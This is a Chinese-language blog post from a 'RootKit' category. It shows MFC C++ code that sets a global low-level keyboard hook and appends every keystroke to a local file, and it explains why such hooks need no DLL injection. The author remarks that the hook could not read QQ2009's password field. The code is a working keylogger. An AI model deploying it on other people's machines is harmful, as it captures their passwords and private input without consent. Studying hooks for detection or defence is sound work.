S.l.e!ep.￠%

像打了激速一樣，以四倍的速度運轉，開心的工作
簡單、開放、平等的公司文化；尊重個性、自由與個人價值；

posts - 1098, comments - 335, trackbacks - 0, articles - 1

About ShutDown of Windows（三）

Posted on 2009-11-17 09:12 S.l.e!ep.￠% 閱讀(185) 評論(0) 編輯收藏引用所屬分類: RootKit

接著 About ShutDown of Windows（二） ?繼續，將代碼繼續改進

HHOOK?g_Hook;

LRESULT?CALLBACK?MyKeyHook(int?code,?WPARAM?wParam,?LPARAM?lParam)
{
#if?(_WIN32_WINNT?<?0x0400)
/*
?*?Structure?used?by?WH_KEYBOARD_LL
?*/
typedef?struct?tagKBDLLHOOKSTRUCT?{
????DWORD???vkCode;
????DWORD???scanCode;
????DWORD???flags;
????DWORD???time;
????DWORD???dwExtraInfo;
}?KBDLLHOOKSTRUCT,?FAR?*LPKBDLLHOOKSTRUCT,?*PKBDLLHOOKSTRUCT;
#endif

????PKBDLLHOOKSTRUCT?kbDLLHOOK?=?(PKBDLLHOOKSTRUCT)lParam;
????
????const?char?*info?=?NULL;
????
????if?(wParam?==?WM_KEYDOWN)
????????info?=?"key?down";????
????else?if?(wParam?==?WM_KEYUP)
????????info?=?"key?up";
????else?if?(wParam?==?WM_SYSKEYDOWN)
????????info?=?"sys?key?down";????
????else?if?(wParam?==?WM_SYSKEYUP)
????????info?=?"sys?key?up";

????FILE*?f?=?fopen("hook.txt",?"a+");

????CString?strLog;
????strLog.Format("%s?-?vkCode?[%04x],?[%c]?scanCode?[%04x]\n",?info,?kbDLLHOOK->vkCode,?kbDLLHOOK->vkCode,?kbDLLHOOK->scanCode);

????fwrite(strLog,?1,?strLog.GetLength(),?f);
????fclose(f);

????//?always?call?next?hook
????return?CallNextHookEx(g_Hook,?code,?wParam,?lParam);
}??????

BOOL?CHookTestDlg::OnInitDialog()
{
????CDialog::OnInitDialog();

????//?Add?"About

"?menu?item?to?system?menu.

????//?IDM_ABOUTBOX?must?be?in?the?system?command?range.
????ASSERT((IDM_ABOUTBOX?&?0xFFF0)?==?IDM_ABOUTBOX);
????ASSERT(IDM_ABOUTBOX?<?0xF000);

????CMenu*?pSysMenu?=?GetSystemMenu(FALSE);
????if?(pSysMenu?!=?NULL)
????{
????????CString?strAboutMenu;
????????strAboutMenu.LoadString(IDS_ABOUTBOX);
????????if?(!strAboutMenu.IsEmpty())
????????{
????????????pSysMenu->AppendMenu(MF_SEPARATOR);
????????????pSysMenu->AppendMenu(MF_STRING,?IDM_ABOUTBOX,?strAboutMenu);
????????}
????}

????//?Set?the?icon?for?this?dialog.??The?framework?does?this?automatically
????//??when?the?application's?main?window?is?not?a?dialog
????SetIcon(m_hIcon,?TRUE);????????????//?Set?big?icon
????SetIcon(m_hIcon,?FALSE);????????//?Set?small?icon
????
????//?TODO:?Add?extra?initialization?here
#ifndef?WH_KEYBOARD_LL
????#define?WH_KEYBOARD_LL?13
#endif
????
????g_Hook?=?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
????
????if(?g_Hook?==?NULL?)
????????AfxMessageBox("Failed?to?Set?Hook");
????
????return?TRUE;??//?return?TRUE??unless?you?set?the?focus?to?a?control
}

已經實現了HOOK鍵盤消息（題外話：對于普通的程序確實可行，但對于QQ2009的PwdEdit顯示出來的東西是不對的，明顯QQ2009的PwdEdit對消息加密過）

用 SysCheck 工具查看，這個EXE也并沒有注入到其它進程

MSDN的解釋

WH_KEYBOARD_LL

Windows NT/2000/XP: Installs a hook procedure that monitors low-level keyboard input events. For more information, see the LowLevelKeyboardProc hook procedure.

If the input comes from a call to keybd_event, the input was "injected". However, the WH_KEYBOARD_LL hook is not injected into another process. Instead, the context switches back to the process that installed the hook and it is called in its original context. Then the context switches back to the application that generated the event.

???????? 一般情況下，全局消息鉤子要依賴于一個DLL才能夠正常工作。

但實際上不是這樣的。有某些全局鉤子可以不依賴于任何DLL而正常工作的。這些鉤子包括，WH_JOURNALPLAYBACK，WH_JOURNALRECORD，WH_KEYBOARD_LL，WH_MOUSE_LL。為什么這些鉤子可以不依賴于DLL而正常工作呢？我們可以從MSDN中得到答案，MSDN中對于這四種鉤子都這樣的描述“This hook is called in the context of the thread that installed it.”，翻譯成中文意思是鉤子函數的調用是在安裝鉤子的線程上下文中進行的，說得更明白些，意思就是這些鉤子是在哪個線程當中安裝的，其鉤子函數就在哪個線程中執行。所以使用這四種鉤子是達不到代碼注入的效果的，當然也就可以不依賴于任何DLL了。MSDN中只對個別鉤子指出了必須還是沒有必要使用DLL。

只有注冊用戶登錄后才能發表評論。
【推薦】100%開源！大型工業跨平臺軟件C++源碼提供，建模，組態！

相關文章: Load Driver protect_pwd.txt Windows下Hook API技術 inline hook 對付API-splicing的一種簡單方法修改IAT實現API HOOK API-HOOK and ANTI-API-HOOK For Ring3 API Hook jmp 法 DirectX Input 鍵盤實現收藏一個反鍵盤記錄工具的分析不用hook 實現掛機鎖

網站導航: 博客園 IT新聞 BlogJava 博問 Chat2DB 管理

S.l.e!ep.￠%

About ShutDown of Windows（三）

日歷

公告

常用鏈接

留言簿(5)

隨筆分類(1107)

隨筆檔案(1098)

文章檔案(1)

相冊

收藏夾(3)

DataStruct

搜索

積分與排名

最新評論

閱讀排行榜

評論排行榜